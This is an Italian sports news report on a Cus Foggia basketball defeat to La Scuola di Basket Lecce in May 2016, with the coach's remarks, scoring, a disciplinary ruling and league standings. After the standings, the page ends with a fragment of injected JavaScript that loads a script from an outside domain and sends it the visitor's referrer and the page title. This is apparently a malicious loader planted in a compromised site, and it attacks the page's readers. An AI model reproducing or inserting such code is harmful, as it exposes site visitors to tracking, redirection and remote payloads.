.
News
  • Home

Prima sconfitta nella Poule Promozione, ma il Cus Foggia non molla l’obiettivo Serie D

di trarre 0
11 Mag 2016
I ragazzi di coach Lamacchia hanno perso lo scontro al vertice con La Scuola di Basket Lecce (77-60).
Niente da rimproverare ai miei ragazzi, abbiamo vinto la nostra partita”

Sconfitta amara e per certi versi dura da digerire per il Cus Foggia Basket, uscito battuto dal campo de La Scuola di basket Lecce, prima squadra capace di fermare la corsa cussina verso la promozione in serie D.

LA PARTITA

L’approccio alla gara del Cus Foggia è praticamente perfetto. La squadra gioca un ottimo basket, e al cospetto di un’avversaria temibile come quella leccese riesce a mettere in mostra tutte le sue qualità.

I primi dieci minuti sono un monologo foggiano ed il primo quarto si chiude con ben quindici punti di distacco, 9-24. Il secondo quarto è più equilibrato, ma il parziale di 16-16 permette ai rossoneri di tornare negli spogliatoi comunque in vantaggio (25-40 al termine del primo tempo).

Nel secondo tempo è invece iniziata un’altra partita, determinata e decisa anche da eventi, episodi e comportamenti che il Cus Foggia ha deciso di non commentare, limitandosi così ad accettare, come sempre, il risultato del campo: 77-60 per i leccesi.

TABELLINO PRIMO TEMPO

Chiappinelli (10), D’Arrissi (8), Campagna (8), Mastroluca (6), Stefano Russo (6), Matella (2).

IL COACH

Nel primo tempo abbiamo giocato una bellissima partita di basket. Siamo rientrati negli spogliatoi – commenta Danilo Lamacchia – soddisfatti sia per il risultato che per la prestazione. Ci aspettavamo chiaramente una reazione da parte dei nostri avversari nella ripresa, e infatti sono stati bravi a guadagnarsi tanti tiri liberi, decisivi ai fini del risultato. Ai miei ragazzi non posso rimproverare nulla, moralmente sentiamo di aver vinto la nostra partita. Ora dobbiamo recuperare fiducia ed entusiasmo in vista del prossimo impegno, sappiamo che la promozione non dipende più soltanto dai nostri risultati, ma ciò non deve costituire un alibi. Siamo i più forti e abbiamo una grande occasione per dimostrarlo. Lotteremo fino al 4 giugno per inseguire il nostro sogno, un sogno che oggi più di ieri meritiamo di realizzare”.

RISULTATI POULE PROMOZIONE – GIRONE A – 1^ GIORNATA DI RITORNO

La Scuola di basket Lecce – Cus Foggia 77-60

Virtus Foggia – Cus Bari 56 – 95

PROVVEDIMENTI DISCIPLINARI

Salterà per squalifica la prossima gara Paolo Matella, perché, “a seguito della comminazione di un fallo tecnico, cercava di avvicinare il secondo arbitro, non riuscendo nell’intento perché fermato dai compagni, con conseguente espulsione”. Per dovere di cronaca è doveroso sottolineare che lo stesso Paolo Matella è uscito dal campo sanguinante, dopo aver ricevuto un forte colpo al naso. 

La società si riserva la possibilità di presentare ricorso.

PROSSIMO TURNO, 14 MAGGIO

Cus Foggia – All Star Francavilla ore 18:30

Cus Bari – La Scuola di basket Lecce ore 20:00

CLASSIFICA

La Scuola di basket Lecce e Cus Foggia 8 (salentini in vantaggio negli scontri diretti)

Cus Bari 6

All Star Francavilla 2

Virtus Foggia 0

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;